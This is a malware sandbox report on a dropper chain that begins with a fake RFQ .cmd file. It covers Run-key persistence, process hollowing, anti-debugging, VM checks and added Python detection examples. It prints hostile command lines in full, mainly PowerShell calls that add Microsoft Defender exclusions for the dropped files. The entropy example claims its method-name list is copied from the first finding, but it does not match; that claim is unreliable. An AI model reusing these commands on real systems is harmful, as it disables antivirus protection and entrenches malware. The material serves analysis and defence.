Source: 9.3.icqplewR.pif.299dfe70.2.raw.unpack, fZN1LTKJ207yQQiYiAB.cs High entropy of concatenated method names: 'eAfKrNnZaQ', 'Y6YK4FbY24', 'VnCKBlkkKQ', 'IUYKMC6841', 'q5bKqBw2nI', 'Kd8Kzf5GPt', 'QrHgYhjl6F', 'P41gpvvsHK', 'squgIeAOpL', 'WH9gDxNkxx'
Source: 9.3.icqplewR.pif.292f4458.3.raw.unpack, OpWNa1gCsVVl3qoAEGr.cs High entropy of concatenated method names: 'Qxsg9ucVmF', 'IK1gSG1MIe', 'HlMg38Lufs', 'khcgrhorVw', 'TqqgkedqLx', 'hIfgycSS5b', 'uJsg8pq9Js', 'sZNghq3n8i', 'DZ2gVSBEfq', 'pABg1p1h7V'
Source: 9.3.icqplewR.pif.292f4458.3.raw.unpack, NlEo0Ug09yCuHlkoV0l.cs High entropy of concatenated method names: 'vH8RjFQkmZ', 'WfyRzNMIRh', 'Wqa64H27Td', 'K0v6Q6BEcv', 'MtP6LHYwWW', 'fQl6wblExn', 'Nqc6qBXiEO', 'hEPU6NGhBf', 'iXi6ZlwSgL', 'Xyk6ifa3rW'
Source: 9.3.icqplewR.pif.292f4458.3.raw.unpack, bLbDKIm580VmkPLDdbf.cs High entropy of concatenated method names: 'zyQ2di3i2l6j5410ink', 'PqCaT53sOkmmaHDmiuO', 'jw7gBdoBAl', 'vh0ry9Sq2v', 'NH9gPeEyqI', 'FFxgtBNYED', 'UCZgxyWA0V', 'aNogbenbYW', 'WWSypjCpEe', 'jm8mJiO6xk'
Source: 9.3.icqplewR.pif.292f4458.3.raw.unpack, dei7f7QlMoqgxwoE3HV.cs High entropy of concatenated method names: 'hdqQm8nJVr', 'O5aQgUTfIR', 'q24QPhhZsG', 'ST9QxupVWT', 'Ne4QN3uACe', 'S91Q60WuBh', 'VrnQEBWOu8', 'ItCQo3Yu40', 'W2BQuo9v4d', 'YkwQF3232R'
Source: 9.3.icqplewR.pif.292f4458.3.raw.unpack, cWm7ZvK9D7DKQBhU0de.cs High entropy of concatenated method names: 'zJCKyRhTCI', 'dgYK8TFHpw', 'OfpKhWVbKY', 'IgAKVc0NcZ', 'lOtK1GP9lg', 'kVaK0Y4iuW', 'GANKjb3sKh', 'FvTKz3PvgQ', 'sY0m4PEviZ', 'wVDmQGm96h'
Source: 9.3.icqplewR.pif.292f4458.3.raw.unpack, CsVmIul6FDAeuEBh3ln.cs High entropy of concatenated method names: 'M6vlF8bbVR', 'lMelYNdtW1', 'ak8ymVSlEAOv4hjo5Yy', 'T4BqefSKTHXRDLtVUGX', 'ztPlE3ZCi4', 'YotlnhPxS8', 'WOOFjgS27fN6tCf0HH1', 'UXnywpSpk0BjtoXKZVx'
Source: 9.3.icqplewR.pif.292f4458.3.raw.unpack, lULnMFi3tidiQoIr9Q9.cs High entropy of concatenated method names: 'Nx6ik7o4vm', 'g2ai8E73Zr', 'vHSiVtoD5N', 'C7Bi0Cks17', 'wP3ijxQ4yX', 'wJRizVdd3a', 'in5s4KfFxC', 'NMxsQ2SPuv', 'wqRsLenUvQ', 'd7xsw7XmeS'
Source: 9.3.icqplewR.pif.292f4458.3.raw.unpack, mK7HkAlhQXehFFXaTSG.cs High entropy of concatenated method names: 'NyDKxXomDv', 'hXMKbjw9Ed', 'a9eKNZbycU', 'MCwBA3SuaKEcIsgtsF2', 'Fo7AOMSWlooyUg6NTes', 'cTBl1bDtOv', 'mOPl065GRZ', 'tErljd8g4e', 'tVblzguIdZ', 'hOrK4baair'
Source: 20.2.icqplewR.pif.1cee0000.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'BL1I6XGhq9AA4', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
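The "High entropy of concatenated method names" findings are a Shannon-entropy check over identifier text: name-mangling obfuscators replace meaningful method names with random alphanumerics, pushing the per-character entropy toward the alphanumeric maximum of about 5.95 bits, while real identifiers sit around 4.2. The code below is an added example, not Joe Sandbox's implementation. The obfuscated list is copied from the first finding above; the readable list, the 4.8-bit threshold and the minimum length are assumptions for comparison.

```python
"""Shannon entropy of concatenated .NET method names.

Added example for this report; not Joe Sandbox's implementation. OBFUSCATED is
copied from the first "High entropy of concatenated method names" finding above;
READABLE and the 4.8-bit threshold are assumptions used for comparison.
"""
import math
from collections import Counter

OBFUSCATED = ['Uqohxn7GrP', 'gbVh4r6IUF', 'cUoh8g8Vev', 'oDEhBc1I4Q', 'gFDhnAa9Q1',
              'Uo9hM1GoGP', 'LhEhqSVXhg', 'kvdhzoJ6NM', 's2sLYqj9jB', 'S8KLpIli9g']
READABLE = ['GetConnection', 'SendMessage', 'ParseHeader', 'WriteLog', 'CloseSocket',
            'LoadConfig', 'StartTimer', 'StopTimer', 'Dispose', 'ToString']

THRESHOLD_BITS = 4.8   # assumed; real identifiers ~4.2, [A-Za-z0-9] maxes at log2(62) ~ 5.95
MIN_CHARS = 60         # assumed; entropy of very short strings is not meaningful


def shannon_entropy(text: str) -> float:
    """Bits per character of `text` (0.0 for an empty string)."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def name_entropy(names) -> float:
    """Entropy of all method names of a type concatenated, as the signature does."""
    return shannon_entropy("".join(names))


def looks_obfuscated(names, threshold=THRESHOLD_BITS, min_chars=MIN_CHARS) -> bool:
    """True when the concatenated names are long enough to judge and exceed the threshold."""
    joined = "".join(names)
    return len(joined) >= min_chars and shannon_entropy(joined) >= threshold


if __name__ == "__main__":
    for label, names in (("obfuscated", OBFUSCATED), ("readable", READABLE)):
        print(f"{label:10s} {name_entropy(names):.2f} bits/char  flagged={looks_obfuscated(names)}")
```

The minimum-length guard matters: a type with two short methods cannot reach a stable entropy estimate, and short-name false positives are the usual complaint about this heuristic.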

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe File created: C:\Users\user\Links\icqplewR.pif Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe File created: C:\Users\user\Links\Rwelpqci.PIF Jump to dropped file
Source: C:\Users\user\Links\icqplewR.pif File created: C:\Users\user\AppData\Roaming\XClient.exe Jump to dropped file
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\user\AppData\Local\Temp\x.exe Jump to dropped file

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\x.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rwelpqci Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient Jump to behavior
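Read together, the two blocks above give the persistence chain: extrac32.exe writes x.exe, x.exe drops two .PIF files into the user's Links folder and registers Rwelpqci under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, and icqplewR.pif drops XClient.exe and registers XClient the same way. A .PIF that is really a PE is still handed to the normal executable loader, so the extension only evades casual inspection. The triage below is an added example, not the report's or the sample's code. The report lists only the Run value names, not their data, so the command lines are constructed on the assumption that each value launches the dropped file of the same name; the OneDrive entry is a constructed benign control.

```python
"""Triage HKCU Run values against the files a sandbox saw dropped.

Added example for this report, not the sample's code. The report names the
Run values (Rwelpqci, XClient) but not their data, so RUN_VALUES is
constructed on the assumption that each value launches the dropped file of
the same name; the OneDrive entry is a constructed benign control.
"""
import ntpath
import re

# Dropped files listed in the report
DROPPED = {
    r"C:\Users\user\AppData\Local\Temp\x.exe",
    r"C:\Users\user\Links\icqplewR.pif",
    r"C:\Users\user\Links\Rwelpqci.PIF",
    r"C:\Users\user\AppData\Roaming\XClient.exe",
}

# Constructed HKCU\...\CurrentVersion\Run data (assumption, see docstring)
RUN_VALUES = {
    "Rwelpqci": r'"C:\Users\user\Links\Rwelpqci.PIF"',
    "XClient": r'"C:\Users\user\AppData\Roaming\XClient.exe"',
    "OneDrive": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
}

# Extensions Windows hands to the PE loader even though they are not .exe
ODD_EXEC_EXT = {".pif", ".scr", ".com", ".cpl"}
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
_UNQUOTED = re.compile(r"(\S+?\.(?:exe|pif|scr|com|cpl|bat|cmd))(?=\s|$)", re.IGNORECASE)


def image_path(command: str) -> str:
    """Executable path from a Run value's command line (quoted or bare)."""
    command = command.strip()
    if command.startswith('"'):
        close = command.find('"', 1)
        return command[1:close] if close > 0 else command[1:]
    m = _UNQUOTED.match(command)
    return m.group(1) if m else command.split()[0]


def triage_run_values(run_values, dropped_files):
    """{value_name: (image_path, [reasons])} for every value that trips a check."""
    dropped = {p.lower() for p in dropped_files}
    findings = {}
    for name, command in run_values.items():
        path = image_path(command)
        low = path.lower()
        reasons = []
        if low in dropped:
            reasons.append("image is a file the sandbox saw dropped")
        if ntpath.splitext(low)[1] in ODD_EXEC_EXT:
            reasons.append("PE under a non-.exe extension that still executes")
        if low.startswith(USER_WRITABLE):
            reasons.append("image in a user-writable location")
        if reasons:
            findings[name] = (path, reasons)
    return findings


def suspicious_run_values(run_values, dropped_files, min_reasons=2):
    """Value names with at least `min_reasons` hits. A lone 'user-writable'
    hit is normal for per-user installers, hence the weighting."""
    return sorted(name for name, (_, reasons)
                  in triage_run_values(run_values, dropped_files).items()
                  if len(reasons) >= min_reasons)


if __name__ == "__main__":
    for name, (path, reasons) in triage_run_values(RUN_VALUES, DROPPED).items():
        print(f"{name:10s} {path}\n    " + "\n    ".join(reasons))
    print("suspicious:", suspicious_run_values(RUN_VALUES, DROPPED))
```

On a live host the `RUN_VALUES` dictionary would be filled from the HKCU and HKLM Run keys and `DROPPED` from the sandbox's dropped-file list; the weighting keeps a per-user installer in AppData from being reported on the strength of its location alone.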

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F664E4 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_03F664E4
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\Links\icqplewR.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Links\icqplewR.pif WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\Links\icqplewR.pif WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Links\icqplewR.pif WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Links\icqplewR.pif Memory allocated: 21D20000 memory reserve | memory write watch
Source: C:\Users\user\Links\icqplewR.pif Memory allocated: 22370000 memory reserve | memory write watch
Source: C:\Users\user\Links\icqplewR.pif Memory allocated: 22190000 memory reserve | memory write watch
Source: C:\Users\user\Links\icqplewR.pif Memory allocated: 26A90000 memory reserve | memory write watch
Source: C:\Users\user\Links\icqplewR.pif Memory allocated: 27A90000 memory reserve | memory write watch
Source: C:\Users\user\Links\icqplewR.pif Memory allocated: 27C20000 memory reserve | memory write watch
Source: C:\Users\user\Links\icqplewR.pif Memory allocated: 28C20000 memory reserve | memory write watch
Source: C:\Users\user\Links\icqplewR.pif Memory allocated: 28F40000 memory reserve | memory write watch
Source: C:\Users\user\Links\icqplewR.pif Memory allocated: 1CC20000 memory reserve | memory write watch
Source: C:\Users\user\Links\icqplewR.pif Memory allocated: 1D040000 memory reserve | memory write watch
Source: C:\Users\user\Links\icqplewR.pif Memory allocated: 1CDF0000 memory reserve | memory write watch
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear, 9_1_004019F0
Source: C:\Users\user\Links\icqplewR.pif Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Links\icqplewR.pif Window / User API: threadDelayed 9605
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5847
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3902
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7625
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2010
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5662
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4039
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6454
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3269
Source: C:\Users\user\AppData\Roaming\XClient.exe Evasive API call chain: GetLocalTime,DecisionNodes
Source: C:\Users\user\Links\icqplewR.pif TID: 1548 Thread sleep time: -41505174165846465s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7692 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\Links\icqplewR.pif TID: 1400 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7760 Thread sleep count: 7625 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4804 Thread sleep count: 2010 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6060 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7712 Thread sleep count: 5662 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8156 Thread sleep count: 4039 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7744 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8136 Thread sleep count: 6454 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8164 Thread sleep count: 3269 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5176 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\user\Links\icqplewR.pif WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Links\icqplewR.pif File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F552F8 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 3_2_03F552F8
Source: C:\Users\user\AppData\Roaming\XClient.exe Code function: 28_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime, 28_2_0040128D
Source: C:\Users\user\AppData\Roaming\XClient.exe Code function: 28_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose, 28_2_00401612
Source: C:\Users\user\AppData\Roaming\XClient.exe Code function: 29_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime, 29_2_0040128D
Source: C:\Users\user\AppData\Roaming\XClient.exe Code function: 29_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose, 29_2_00401612
Source: C:\Users\user\Links\icqplewR.pif Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Windows\SysWOW64\avicap32.dll
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Windows\SysWOW64\MSVFW32.dll
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Windows\SysWOW64\en-US\MSVFW32.dll.mui
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Windows\SysWOW64\en-US\avicap32.dll.mui
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Windows\SysWOW64\wbem\en-US\wmiutils.dll.mui
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
Source: icqplewR.pif, 00000009.00000003.1896768334.0000000028F41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ronIgnuQEMuCAEKH8ln
Source: x.exe, 00000003.00000002.1224081576.0000000001F46000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllssW4
Source: Rwelpqci.PIF, 00000013.00000002.1349651483.0000000001E68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Links\Rwelpqci.PIF API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\XClient.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Links\icqplewR.pif Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F6A5B0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent, 3_2_03F6A5B0
Source: C:\Users\user\AppData\Local\Temp\x.exe Process queried: DebugPort
Source: C:\Users\user\Links\Rwelpqci.PIF Process queried: DebugPort
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_1_0040CE09
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear, 9_1_004019F0
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F63E20 LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary, 3_2_03F63E20
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_0040ADB0 GetProcessHeap,HeapFree, 9_1_0040ADB0
Source: C:\Users\user\Links\icqplewR.pif Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_1_0040E61C
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_1_00416F6A
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_004123F1 SetUnhandledExceptionFilter, 9_1_004123F1
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_0040CE09
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_0040E61C
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_00416F6A
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_2_004123F1 SetUnhandledExceptionFilter, 20_2_004123F1
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_1_0040CE09
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_1_0040E61C
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_1_00416F6A
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_1_004123F1 SetUnhandledExceptionFilter, 20_1_004123F1
Source: C:\Users\user\Links\icqplewR.pif Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Links\icqplewR.pif Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Links\icqplewR.pif'
Source: C:\Users\user\Links\icqplewR.pif Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: C:\Users\user\Links\icqplewR.pif base: 400000 protect: page execute and read and write
Source: C:\Users\user\Links\Rwelpqci.PIF Memory allocated: C:\Users\user\Links\icqplewR.pif base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\x.exe Section unmapped: C:\Users\user\Links\icqplewR.pif base address: 400000
Source: C:\Users\user\Links\Rwelpqci.PIF Section unmapped: C:\Users\user\Links\icqplewR.pif base address: 400000
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory written: C:\Users\user\Links\icqplewR.pif base: 20A008
Source: C:\Users\user\Links\Rwelpqci.PIF Memory written: C:\Users\user\Links\icqplewR.pif base: 2C4008
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\RFQ_HB648836_Enquiry.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Users\user\Links\icqplewR.pif C:\\Users\\user\\Links\icqplewR.pif
Source: C:\Users\user\Links\icqplewR.pif Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'icqplewR.pif'
Source: C:\Users\user\Links\icqplewR.pif Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Users\user\Links\Rwelpqci.PIF Process created: C:\Users\user\Links\icqplewR.pif C:\\Users\\user\\Links\icqplewR.pif
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 3_2_03F554BC
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: GetLocaleInfoA, 3_2_03F5A104
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: GetLocaleInfoA, 3_2_03F5A0B8
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 3_2_03F555C8
Source: C:\Users\user\Links\icqplewR.pif Code function: GetLocaleInfoA, 9_1_00417A20
Source: C:\Users\user\Links\Rwelpqci.PIF Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 19_2_040754BC
